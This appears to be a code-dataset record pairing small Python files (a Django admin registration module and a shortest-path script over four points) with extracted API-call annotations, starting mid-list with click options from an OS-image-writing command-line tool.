] | [((269, 282), 'click.group', 'click.group', ([], {}), '()\n', (280, 282), False, 'import click\n'), ((284, 317), 'click.version_option', 'click.version_option', (['__version__'], {}), '(__version__)\n', (304, 317), False, 'import click\n'), ((319, 424), 'click.option', 'click.option', (['"""--traceback"""'], {'is_flag': '(True)', 'help': '"""Show the full python exception if an error occurs."""'}), "('--traceback', is_flag=True, help=\n 'Show the full python exception if an error occurs.')\n", (331, 424), False, 'import click\n'), ((552, 640), 'click.option', 'click.option', (['"""--hidden/--plain"""'], {'default': '(True)', 'help': '"""Hide or show password input."""'}), "('--hidden/--plain', default=True, help=\n 'Hide or show password input.')\n", (564, 640), False, 'import click\n'), ((931, 951), 'click.argument', 'click.argument', (['"""os"""'], {}), "('os')\n", (945, 951), False, 'import click\n'), ((1112, 1188), 'click.option', 'click.option', (['"""-o"""', '"""--output"""'], {'help': '"""Device path to write the OS image to."""'}), "('-o', '--output', help='Device path to write the OS image to.')\n", (1124, 1188), False, 'import click\n'), ((1194, 1317), 'click.option', 'click.option', (['"""--chksum/--no-chksum"""', '"""-c/ """'], {'default': '(False)', 'help': '"""Check the checksum of the OS image before writing."""'}), "('--chksum/--no-chksum', '-c/ ', default=False, help=\n 'Check the checksum of the OS image before writing.')\n", (1206, 1317), False, 'import click\n'), ((1318, 1388), 'click.option', 'click.option', (['"""--target"""', '"""-t"""'], {'help': '"""Name of the configuration file."""'}), "('--target', '-t', help='Name of the configuration file.')\n", (1330, 1388), False, 'import click\n'), ((1395, 1496), 'click.option', 'click.option', (['"""--become"""', '"""-b"""'], {'is_flag': '(True)', 'help': '"""Run the writing of the image as super user."""'}), "('--become', '-b', is_flag=True, help=\n 'Run the writing of the image as super 
user.')\n", (1407, 1496), False, 'import click\n'), ((1498, 1592), 'click.option', 'click.option', (['"""--remove"""', '"""-r"""'], {'is_flag': '(True)', 'help': '"""Remove the image file after writing."""'}), "('--remove', '-r', is_flag=True, help=\n 'Remove the image file after writing.')\n", (1510, 1592), False, 'import click\n'), ((1593, 1672), 'click.option', 'click.option', (['"""--keep"""', '"""-k"""'], {'is_flag': '(True)', 'help': '"""Keep the downloaded archive."""'}), "('--keep', '-k', is_flag=True, help='Keep the downloaded archive.')\n", (1605, 1672), False, 'import click\n'), ((1678, 1818), 'click.option', 'click.option', (['"""--encrypted/--decrypted"""', '""" /-d"""'], {'default': '(True)', 'help': '"""Force usage of encrypted or decrypted provisioning configuration."""'}), "('--encrypted/--decrypted', ' /-d', default=True, help=\n 'Force usage of encrypted or decrypted provisioning configuration.')\n", (1690, 1818), False, 'import click\n'), ((2382, 2406), 'click.argument', 'click.argument', (['"""target"""'], {}), "('target')\n", (2396, 2406), False, 'import click\n'), ((2408, 2484), 'click.option', 'click.option', (['"""-o"""', '"""--output"""'], {'help': '"""Device path to write the OS image to."""'}), "('-o', '--output', help='Device path to write the OS image to.')\n", (2420, 2484), False, 'import click\n'), ((2490, 2630), 'click.option', 'click.option', (['"""--encrypted/--decrypted"""', '""" /-d"""'], {'default': '(True)', 'help': '"""Force usage of encrypted or decrypted provisioning configuration."""'}), "('--encrypted/--decrypted', ' /-d', default=True, help=\n 'Force usage of encrypted or decrypted provisioning configuration.')\n", (2502, 2630), False, 'import click\n'), ((2994, 3018), 'click.argument', 'click.argument', (['"""device"""'], {}), "('device')\n", (3008, 3018), False, 'import click\n'), ((3283, 3307), 'click.argument', 'click.argument', (['"""device"""'], {}), "('device')\n", (3297, 3307), False, 'import click\n'), ((3580, 
3690), 'click.option', 'click.option', (['"""-a"""', '"""--all"""'], {'is_flag': '(True)', 'help': '"""All available images (not only Raspberry Pi OS images)."""'}), "('-a', '--all', is_flag=True, help=\n 'All available images (not only Raspberry Pi OS images).')\n", (3592, 3690), False, 'import click\n'), ((4067, 4172), 'click.option', 'click.option', (['"""--verbose"""', '"""-v"""'], {'is_flag': '(True)', 'help': '"""Show the complete description of the os image."""'}), "('--verbose', '-v', is_flag=True, help=\n 'Show the complete description of the os image.')\n", (4079, 4172), False, 'import click\n'), ((4173, 4195), 'click.argument', 'click.argument', (['"""name"""'], {}), "('name')\n", (4187, 4195), False, 'import click\n'), ((233, 265), 'click.echo', 'click.echo', (['msg'], {'file': 'sys.stderr'}), '(msg, file=sys.stderr)\n', (243, 265), False, 'import click\n'), ((176, 197), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (195, 197), False, 'import traceback\n'), ((992, 1019), 'click.Path', 'click.Path', ([], {'file_okay': '(False)'}), '(file_okay=False)\n', (1002, 1019), False, 'import click\n'), ((4398, 4414), 'click.echo', 'click.echo', (['desc'], {}), '(desc)\n', (4408, 4414), False, 'import click\n'), ((4441, 4472), 'click.echo', 'click.echo', (["desc['description']"], {}), "(desc['description'])\n", (4451, 4472), False, 'import click\n')] |
from django.contrib import admin
from ServerRestAPI.models import (
Student, Teacher, StudentLecture,
TeacherLecture, Lecture
)
# Register these models with the default admin site so each gets the
# auto-generated ModelAdmin interface (same registration order as before).
for _model in (Student, Teacher, StudentLecture, TeacherLecture):
    admin.site.register(_model)
admin.site.register(Lecture) | [
"django.contrib.admin.site.register"
] | [((143, 171), 'django.contrib.admin.site.register', 'admin.site.register', (['Student'], {}), '(Student)\n', (162, 171), False, 'from django.contrib import admin\n'), ((172, 200), 'django.contrib.admin.site.register', 'admin.site.register', (['Teacher'], {}), '(Teacher)\n', (191, 200), False, 'from django.contrib import admin\n'), ((201, 236), 'django.contrib.admin.site.register', 'admin.site.register', (['StudentLecture'], {}), '(StudentLecture)\n', (220, 236), False, 'from django.contrib import admin\n'), ((237, 272), 'django.contrib.admin.site.register', 'admin.site.register', (['TeacherLecture'], {}), '(TeacherLecture)\n', (256, 272), False, 'from django.contrib import admin\n'), ((273, 301), 'django.contrib.admin.site.register', 'admin.site.register', (['Lecture'], {}), '(Lecture)\n', (292, 301), False, 'from django.contrib import admin\n')] |
import itertools
import math

# Four points, one "x y" pair per stdin line. A route always starts at
# point 0 and visits points 1-3 in some order; we keep the shortest total
# length in `ans` (printed, truncated to int, by the line below).
D = [list(map(int, input().split())) for _ in range(4)]

# Seed with math.inf instead of the old magic 999999999999 sentinel, which
# would silently produce a wrong answer if every route were longer than it.
ans = math.inf
for order in itertools.permutations((1, 2, 3)):
    stops = (0,) + order
    length = 0.0
    for a, b in zip(stops, stops[1:]):
        # Euclidean distance between consecutive stops on the route.
        length += math.sqrt((D[a][0] - D[b][0]) ** 2 + (D[a][1] - D[b][1]) ** 2)
    ans = min(ans, length)
print(int(ans)) | [
"itertools.permutations",
"math.sqrt"
] | [((43, 71), 'itertools.permutations', 'itertools.permutations', (['L', '(3)'], {}), '(L, 3)\n', (65, 71), False, 'import itertools, math\n'), ((230, 317), 'math.sqrt', 'math.sqrt', (['((D[k[i - 1]][0] - D[k[i]][0]) ** 2 + (D[k[i - 1]][1] - D[k[i]][1]) ** 2)'], {}), '((D[k[i - 1]][0] - D[k[i]][0]) ** 2 + (D[k[i - 1]][1] - D[k[i]][1]\n ) ** 2)\n', (239, 317), False, 'import itertools, math\n')] |